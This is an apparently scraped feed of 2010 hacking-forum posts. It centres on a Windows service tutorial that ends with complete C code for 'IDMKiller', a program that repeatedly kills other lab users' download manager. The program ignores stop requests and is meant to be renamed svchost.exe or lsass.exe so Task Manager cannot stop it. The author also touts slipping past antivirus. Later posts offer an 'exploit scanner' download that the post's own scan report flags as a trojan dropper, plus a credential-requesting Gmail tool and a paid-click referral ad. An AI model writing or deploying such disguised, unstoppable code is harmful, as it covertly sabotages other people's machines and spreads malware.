&nbsp;&nbsp;&nbsp;&nbsp;//register the ServiceSignalHandler<br />
&nbsp;&nbsp;&nbsp;&nbsp;// RegisterServiceCtrlHandler("ServiceName", SignalHandlerFunc) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// if needed initialize other data<br />
&nbsp;&nbsp;&nbsp;&nbsp;// if lengthy open anoter thread<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;//set the service_status to SERVICE_RUNNING<br />
&nbsp;&nbsp;&nbsp;&nbsp;//apply it by calling SetServiceStatus(handle2ServiceStatus, &amp;service_status) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// :D:D:D do ur job here :D:D:D<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// return ;<br />
}<br />
<br />
void WINAPI ServiceSignalHandler(DWORD signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//this is where u receive signal from service control manager<br />
&nbsp;&nbsp;&nbsp;&nbsp;//it handles those simultaneoussly just say what to do<br />
&nbsp;&nbsp;&nbsp;&nbsp;//switch(signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp; case&nbsp;&nbsp;SERVICE_CONTROL_PAUSE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;do something to make ur job pause and set the status via SetServiceStatus()<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;but do we care ??<br />
&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//}<br />
}</code></div></div>
When u r comfortable with both Service Programming, and Multithreading u will be able to write Multithreaded service program in a blink of an eye :lolz:<br />
<br />
Now one more thing: u need to install ur service first, here is how u do it<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Install(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Open serviceControlManager to get its handle<br />
&nbsp;&nbsp;&nbsp;&nbsp;// hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ; <br />
&nbsp;&nbsp;&nbsp;&nbsp;// nulls are for default values and they are the best google it<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Create service<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// CreateService(hSCM, "ServiceName", "DisplayName", other params...) google them<br />
&nbsp;&nbsp;&nbsp;&nbsp;// Close the service handle<br />
&nbsp;&nbsp;&nbsp;&nbsp;// by the way no-6 param could be set to SERVICE_AUTO_START for startup start or<br />
&nbsp;&nbsp;&nbsp;&nbsp;// SERVICE_DEMAND_START&nbsp;&nbsp;-- just saying, thought important<br />
}</code></div></div>
U culd also uninstall the code is later provided, read it, understand it, type it then u r sure to get the hang of this.<br />
<br />
Hooh.... I barely covered any topic. But this topics are beyond a tut. You will have to google to learn. You should learn the following..<br />
1. Service Account system (Security)<br />
2. Query Service<br />
3. Configure a Service<br />
<br />
How can i get away with out giving an example ??? In our dept. lab some people eat high bandwidth by downloading with IDM, and others don't get the simplest browsing speed, so decided to make this cutie..<br />
<br />
It ignores the service managers stop requeset, and if renamed to (I mean compiled as) name like svchost.exe or lsass.exe or csrss.exe then the taskmanager won't kill them either. the installer is in the same program, run it like svchost -i to install, and svchost -u to <br />
uninstall.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>/*<br />
&nbsp;&nbsp;&nbsp;&nbsp;A Windows Service Program to kill IDM<br />
&nbsp;&nbsp;&nbsp;&nbsp;Rename the exe to something like svchost.exe or lsass.exe or csrss.exe <br />
&nbsp;&nbsp;&nbsp;&nbsp;or anything similiar to windows critical file name so the task manager fails to kill<br />
&nbsp;&nbsp;&nbsp;&nbsp;well at least in win xp<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;FileName: IDMKiller.cpp<br />
&nbsp;&nbsp;&nbsp;&nbsp;Author: dumb_terminal<br />
*/<br />
<br />
#define _WIN32_WINNT 0x0501<br />
<br />
//although not essential<br />
#pragma comment (lib, "advapi32.lib")<br />
<br />
#include &lt;stdio.h&gt;<br />
#include &lt;windows.h&gt;<br />
#include &lt;tlhelp32.h&gt;<br />
<br />
typedef PROCESSENTRY32 PROCESS ;<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv) ;<br />
void WINAPI ServiceSignalHandler(DWORD signal) ;<br />
bool InstallService() ;<br />
bool UninstallService() ;<br />
<br />
SERVICE_STATUS SS ;<br />
SERVICE_STATUS_HANDLE hSS ;<br />
<br />
void main(int argc, char *argv[]){<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (argc == 2){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (argv[1][1] == 'i'){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!InstallService())<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Error Installing Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}else if (argv[1][1] == 'u'){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!UninstallService())<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Error Uninstalling Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}else{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SERVICE_TABLE_ENTRY serviceTable[] = {{ "IDMKiller", ServiceMain }, {NULL, NULL} } ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (!StartServiceCtrlDispatcher(serviceTable))<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("StartServiceCtrlDispatcher() failed&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
}<br />
<br />
void WINAPI ServiceMain(DWORD argc, LPSTR *argv){<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwServiceType = SERVICE_WIN32 ;&nbsp;&nbsp;//could be SERVICE_ADAPTER or SERVICE_DRIVER <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//or SERVICE_INTERACTIVE_PROCESS<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCurrentState = SERVICE_START_PENDING ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwControlsAccepted = SERVICE_ACCEPT_STOP ; //we won't be stopping anyway :D<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwServiceSpecificExitCode = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWaitHint = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWin32ExitCode = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCheckPoint = 0 ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSS = RegisterServiceCtrlHandler("IDMKiller", ServiceSignalHandler) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSS == (SERVICE_STATUS_HANDLE)0){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("RegisterServiceCtrlHandler() failed&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;// here could be initialization but we don't need need any...:D<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCurrentState = SERVICE_RUNNING ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwCheckPoint = 0 ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SS.dwWaitHint = 0 ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;SetServiceStatus(hSS, &amp;SS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;//out IDMSearch and Kill<br />
&nbsp;&nbsp;&nbsp;&nbsp;while(1){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//we check at regular 5 second basis<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sleep(5000) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PROCESS proc ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSnap, hProcess ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Process32First(hProcess, &amp;proc) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;do{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if (strstr(proc.szExeFile, "IDMan.exe")){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, proc.th32ProcessID) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;TerminateProcess(hProcess, 0) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}while (Process32Next(hSnap, &amp;proc)) ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CloseHandle(hProcess) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
}<br />
<br />
void WINAPI ServiceSignalHandler(DWORD signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;switch(signal){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_PAUSE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//ignore - we chose not to accept it anyway<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ; <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_CONTINUE:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//ignore - we chose not to accept it anyway<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case SERVICE_CONTROL_STOP:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//certainly not - we won't take any action if we are told to stop<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;default:<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;return ;<br />
}<br />
<br />
bool InstallService(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;char dir[255] ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSCM ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SC_HANDLE hService ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;LPCTSTR binPath = dir ;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;GetCurrentDirectory(255, dir) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;strcat(dir, "&#92;&#92;IDMKiller.exe") ; //replace IDMKiller with something like svchost<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //to make it invincible to task manager<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSCM == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Could not open Service Control Manager&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;hService = CreateService(hSCM, "IDMKiller", "IDMKiller", SERVICE_ALL_ACCESS, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; binPath, NULL, NULL, NULL, NULL, NULL) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hService == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't get service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;CloseServiceHandle(hService) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;return true ;<br />
}<br />
<br />
bool UninstallService(){<br />
&nbsp;&nbsp;&nbsp;&nbsp;HANDLE hSCM;<br />
&nbsp;&nbsp;&nbsp;&nbsp;SC_HANDLE hService;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hSCM == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Could not Open Service Control Manager&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;hService=OpenService(hSCM, "IDMKiller", SERVICE_ALL_ACCESS);<br />
&nbsp;&nbsp;&nbsp;&nbsp;if (hService == NULL){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't get service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;if(!DeleteService(hService)){<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf("Couldn't Delete Service&#92;n") ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return false;<br />
&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;CloseServiceHandle(hService) ;<br />
&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;&nbsp;&nbsp;return true;<br />
}</code></div></div>
Haven't tested that much, u guys test it on vista and 7 and plz in4m me, that way we all can learn.<br />
Guyz do u smell it, u have the tool to sneak past most (if not all) AntiViruses.<br />
But there are ways to sneak past it. U c the Service information are stored in the registry<br />
<span style="font-weight: bold;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[ServiceName]\</span><br />
So u can beat those with Registry Operations. And the bad thing is u need to be privileged like admin to install it. But most people usually run as admin. I haven't tested it yet, find it hard to get some time nowadays.. u guys plz test and in4m me, (i heard there is a decent registry tut in this forum <img src="http://h4ck3r.in/board/images/smilies/wink.gif" style="vertical-align: middle;" border="0" alt="Wink" title="Wink" />).<br />
Ok guys bye for now, hope to be back soon, and sorry for this boaring tut. Hats off. Have a nice time]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Trace IP by Email]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1893</link>
			<pubDate>Fri, 03 Sep 2010 12:08:46 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1893</guid>
			<description><![CDATA[To all ,<br />
i want to trace real IP address from email . can any one help ...?<br />
i want details about this IP address 10.6.6.6 ........]]></description>
			<content:encoded><![CDATA[To all ,<br />
i want to trace real IP address from email . can any one help ...?<br />
i want details about this IP address 10.6.6.6 ........]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[You tube  video]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1892</link>
			<pubDate>Thu, 02 Sep 2010 13:58:05 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1892</guid>
			<description><![CDATA[Hey friends is there any way to view the blocked you tube videos <br />
for eg <a href="http://www.youtube.com/videos?ytsession=bHa6KgZMOCwtOSjLVgn9bGLonuaxoN_TCwZ9sQrMruuZuvgHcAK0tXJSatxVXBO&#8203;h5UZprNzzasfWQO5K9cH8ZNkbn5Ssnmjy3xpxqjawOGQW2upz77vv34mA5SlhFUS5vuTmMW8gj1R9bYh&#8203;TDtDYIgEyo73Dwy_HLdNgewJ8r8_eesve7dduZ3zpKjiPPGZ51im6VBdf0sI4Z_01erxOfDuJDgcUCI-P6q4bCnVZWgSzdXGx6v-abUmsrCdd8jFUKV_ThKc9j-iPcWDBnNrWeNSCL-vrhN2iiePFAFsDZnghfK3wr1YuxCpjwFMBLJtcq0qQSOMKv4VewIC6qXWHzeP0O4xicS2qvUo_60LV0U&#8203;V81EVRc1V9TGfBi5OJRjHLXQn7SXKpoi3CoDoVgjXGRPsfc9zmvyiY" target="_blank"> This video </a>]]></description>
			<content:encoded><![CDATA[Hey friends is there any way to view the blocked you tube videos <br />
for eg <a href="http://www.youtube.com/videos?ytsession=bHa6KgZMOCwtOSjLVgn9bGLonuaxoN_TCwZ9sQrMruuZuvgHcAK0tXJSatxVXBO&#8203;h5UZprNzzasfWQO5K9cH8ZNkbn5Ssnmjy3xpxqjawOGQW2upz77vv34mA5SlhFUS5vuTmMW8gj1R9bYh&#8203;TDtDYIgEyo73Dwy_HLdNgewJ8r8_eesve7dduZ3zpKjiPPGZ51im6VBdf0sI4Z_01erxOfDuJDgcUCI-P6q4bCnVZWgSzdXGx6v-abUmsrCdd8jFUKV_ThKc9j-iPcWDBnNrWeNSCL-vrhN2iiePFAFsDZnghfK3wr1YuxCpjwFMBLJtcq0qQSOMKv4VewIC6qXWHzeP0O4xicS2qvUo_60LV0U&#8203;V81EVRc1V9TGfBi5OJRjHLXQn7SXKpoi3CoDoVgjXGRPsfc9zmvyiY" target="_blank"> This video </a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit Scaner]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1891</link>
			<pubDate>Thu, 02 Sep 2010 12:45:57 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1891</guid>
			<description><![CDATA[Hello<br />
<br />
<br />
With This program you can look full of holes for SQL XSS ELDR FRI  pages!<br />
<br />
than you can do Hjacked <img src="http://h4ck3r.in/board/images/smilies/tongue.gif" style="vertical-align: middle;" border="0" alt="Tongue" title="Tongue" />!<br />
<br />
P.S a simple program Defaces is the Havji<br />
<br />
program<br />
<br />
<img src="http://i55.tinypic.com/pojuv.png" border="0" alt="[Image: pojuv.png&#93;" /><br />
<br />
<br />
<span style="font-style: italic;">File Info</span><br />
<br />
Report date: 2010-09-02 12:16:12 (GMT 1)<br />
File name: <span style="font-weight: bold;">exploit-scaner-tac-edit-exe</span><br />
File size: 572940 bytes<br />
MD5 Hash: cf1453ba8a3e213dd732e31e51ee434b<br />
SHA1 Hash: 41d0d57cb43f488b043fcf8f212787ab4365e25e<br />
Detection rate: <span style="color: red;">4</span> on 16 (<span style="color: red;">25%</span>) <br />
Status: <span style="color: red;">INFECTED</span> <br />
<br />
<span style="font-style: italic;">Detections</span><br />
<br />
a-squared - <span style="color: red;">Trojan-Dropper.MSIL!IK</span><br />
Avast - <span style="color: red;"></span><br />
AVG - <span style="color: red;"></span><br />
Avira AntiVir - <span style="color: red;">TR/Dropper.Gen</span><br />
BitDefender - <span style="color: red;"></span><br />
ClamAV - <span style="color: red;"></span><br />
Comodo - <span style="color: red;"></span><br />
Dr.Web - <span style="color: red;"></span><br />
F-PROT6 - <span style="color: red;"></span><br />
Ikarus T3 - <span style="color: red;">Trojan-Dropper.MSIL</span><br />
Kaspersky - <span style="color: red;"></span><br />
NOD32 - <span style="color: red;">MSIL/TrojanDropper.Agent.AL</span><br />
Panda - <span style="color: red;"></span><br />
TrendMicro - <span style="color: red;"></span><br />
VBA32 - <span style="color: red;"></span><br />
VirusBuster - <span style="color: red;"></span><br />
<br />
<span style="font-style: italic;">Scan report generated by<br />
<a href="http://novirusthanks.org" target="_blank">NoVirusThanks.org</a></span><br />
<br />
<br />
<span style="font-weight: bold;"><span style="color: blue;">Download</span></span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.megaupload.com/?d=NOMZC006</code></div></div>
]]></description>
			<content:encoded><![CDATA[Hello<br />
<br />
<br />
With This program you can look full of holes for SQL XSS ELDR FRI  pages!<br />
<br />
than you can do Hjacked <img src="http://h4ck3r.in/board/images/smilies/tongue.gif" style="vertical-align: middle;" border="0" alt="Tongue" title="Tongue" />!<br />
<br />
P.S a simple program Defaces is the Havji<br />
<br />
program<br />
<br />
<img src="http://i55.tinypic.com/pojuv.png" border="0" alt="[Image: pojuv.png]" /><br />
<br />
<br />
<span style="font-style: italic;">File Info</span><br />
<br />
Report date: 2010-09-02 12:16:12 (GMT 1)<br />
File name: <span style="font-weight: bold;">exploit-scaner-tac-edit-exe</span><br />
File size: 572940 bytes<br />
MD5 Hash: cf1453ba8a3e213dd732e31e51ee434b<br />
SHA1 Hash: 41d0d57cb43f488b043fcf8f212787ab4365e25e<br />
Detection rate: <span style="color: red;">4</span> on 16 (<span style="color: red;">25%</span>) <br />
Status: <span style="color: red;">INFECTED</span> <br />
<br />
<span style="font-style: italic;">Detections</span><br />
<br />
a-squared - <span style="color: red;">Trojan-Dropper.MSIL!IK</span><br />
Avast - <span style="color: red;"></span><br />
AVG - <span style="color: red;"></span><br />
Avira AntiVir - <span style="color: red;">TR/Dropper.Gen</span><br />
BitDefender - <span style="color: red;"></span><br />
ClamAV - <span style="color: red;"></span><br />
Comodo - <span style="color: red;"></span><br />
Dr.Web - <span style="color: red;"></span><br />
F-PROT6 - <span style="color: red;"></span><br />
Ikarus T3 - <span style="color: red;">Trojan-Dropper.MSIL</span><br />
Kaspersky - <span style="color: red;"></span><br />
NOD32 - <span style="color: red;">MSIL/TrojanDropper.Agent.AL</span><br />
Panda - <span style="color: red;"></span><br />
TrendMicro - <span style="color: red;"></span><br />
VBA32 - <span style="color: red;"></span><br />
VirusBuster - <span style="color: red;"></span><br />
<br />
<span style="font-style: italic;">Scan report generated by<br />
<a href="http://novirusthanks.org" target="_blank">NoVirusThanks.org</a></span><br />
<br />
<br />
<span style="font-weight: bold;"><span style="color: blue;">Download</span></span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://www.megaupload.com/?d=NOMZC006</code></div></div>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[save 7 gb of your pc]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1889</link>
			<pubDate>Thu, 02 Sep 2010 03:37:59 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1889</guid>
			<description><![CDATA[hey friends I just found one amazing software on google by using this you can save your 7 gb of your pc.<br />
just install this software and gmail drvie will appers in my computer.<br />
When you click on that gmail drive you will then it requires your gmail id and pass just fill it then the gb you have in your gmail only that much gb will apper.<br />
Maximum gb appears is 7 gb.<br />
<br />
Just make a fake gmail id and use it you will get 7 gb by this.<br />
<br />
here is the link friends<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://hotfile.com/dl/66392706/3b72fc5/gmailfs116.zip.html</code></div></div>
]]></description>
			<content:encoded><![CDATA[hey friends I just found one amazing software on google by using this you can save your 7 gb of your pc.<br />
just install this software and gmail drvie will appers in my computer.<br />
When you click on that gmail drive you will then it requires your gmail id and pass just fill it then the gb you have in your gmail only that much gb will apper.<br />
Maximum gb appears is 7 gb.<br />
<br />
Just make a fake gmail id and use it you will get 7 gb by this.<br />
<br />
here is the link friends<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://hotfile.com/dl/66392706/3b72fc5/gmailfs116.zip.html</code></div></div>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[get easy money]]></title>
			<link>http://h4ck3r.in/board/showthread.php?tid=1888</link>
			<pubDate>Thu, 02 Sep 2010 00:02:44 +0000</pubDate>
			<guid isPermaLink="false">http://h4ck3r.in/board/showthread.php?tid=1888</guid>
			<description><![CDATA[<a href="http://www.onbux.com/?rh=01d4adeb754485392fc870ad8588e1ff" target="_blank"><img src="http://images.onbux.com/banner.jpg" border="0" alt="[Image: banner.jpg&#93;" /></a><br />
<br />
Welcome to onBux . . .<br />
We are an advertising system that connects advertisers to possible consumers.<br />
As members, users begin to be paid to view advertisements provided by our sponsors, ensuring benefits to advertisers and you.<br />
<br />
What you get as a member:<br />
 Earn up to &#36;0.02 (2 cents) per click.<br />
 Earn up to &#36;0.01 (1 cent) for every ad your referrals click.<br />
 Instant Payment / Receiving System.<br />
<br />
